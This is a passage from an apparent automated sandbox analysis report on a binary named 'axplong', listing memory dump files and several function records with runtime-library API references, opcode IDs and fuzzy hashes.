                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: P#g$P#g
                                                                                                                                                                                                                                                    • API String ID: 2659868963-973111119
                                                                                                                                                                                                                                                    • Opcode ID: c6b105446824fe3552db64d6be02219f2ac3a838712c38fb2bd7dbbb84c6984d
                                                                                                                                                                                                                                                    • Instruction ID: fc6685d8f0a597efadde589bcf9218c48172b789a08ce52906900d4e14385128
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6b105446824fe3552db64d6be02219f2ac3a838712c38fb2bd7dbbb84c6984d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5F0E5B6D1021D6BC714FFE8DC01D8BB7AEDE06300B00852AF654A7601F6B0FA448BE9
                                                                                                                                                                                                                                                    Function 006722A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 006722D2
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: 7oq<$P#g
                                                                                                                                                                                                                                                    • API String ID: 2659868963-501786529
                                                                                                                                                                                                                                                    • Opcode ID: 6439488e7a5227b809ace7971b807b17122b22b91c75d3680c4314d5f1bb5042
                                                                                                                                                                                                                                                    • Instruction ID: eb10ab6a702d3f35c18dc8ee2d2d425ce6a924f1524015d9a63cf022bf57da49
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6439488e7a5227b809ace7971b807b17122b22b91c75d3680c4314d5f1bb5042
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06F0A771D1020D9BC714DF68D84199DBBF59F59304F1082AEF404A7200EA705A558B99
                                                                                                                                                                                                                                                    Function 00672E40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00672E50
                                                                                                                                                                                                                                                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00672E59
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                                                                                                                                                                                                                                                    • String ID: @.g
                                                                                                                                                                                                                                                    • API String ID: 1432671424-1460316421
                                                                                                                                                                                                                                                    • Opcode ID: 15546eacf105f4de3710b9531955ecb4c35728123bd6edf8964fd002175732b9
                                                                                                                                                                                                                                                    • Instruction ID: 997d77f3722fbe7c1f238345534fcb237c3f990b3857cc34f0358970074c1d57
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15546eacf105f4de3710b9531955ecb4c35728123bd6edf8964fd002175732b9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23E026B280131466C310BFA09C01E9BBFCE9F12311F40452EF98496302EBB1A52443E5
                                                                                                                                                                                                                                                    Function 006724A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 006724BE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768746480.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768765033.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768779649.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768793213.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768807399.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768823367.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768845576.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768859098.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768874341.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768891184.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768905837.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768921386.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768969984.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768984610.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769000531.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769015221.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769031612.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769047938.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769062427.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769108637.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769123572.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769136569.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769151732.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769164889.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769179945.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1769193334.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: P#g$P#g
                                                                                                                                                                                                                                                    • API String ID: 2659868963-973111119
                                                                                                                                                                                                                                                    • Opcode ID: a87ae0b4207b3aaa123527afba2ca96338fe30ae78a5fde6eb6577114a8a9a02
                                                                                                                                                                                                                                                    • Instruction ID: 5a9505a391ddf9bc1ce26d282e79a167be7c37cd771bd9b26d7c89d94101ea1b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a87ae0b4207b3aaa123527afba2ca96338fe30ae78a5fde6eb6577114a8a9a02
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47D012B29203159BD6109F98D801D42BBDDDE16654754852EF544E7300F670E9908FE8
                                                                                                                                                                                                                                                    Function 00672580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0067259E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000001.00000002.1768336160.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768318896.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768336160.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768392135.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768407032.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768422851.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768436667.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768456368.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768563441.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768578614.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768596796.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768639700.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768654389.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768672961.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768687224.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768701857.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768716608.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000001.00000002.1768730939.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
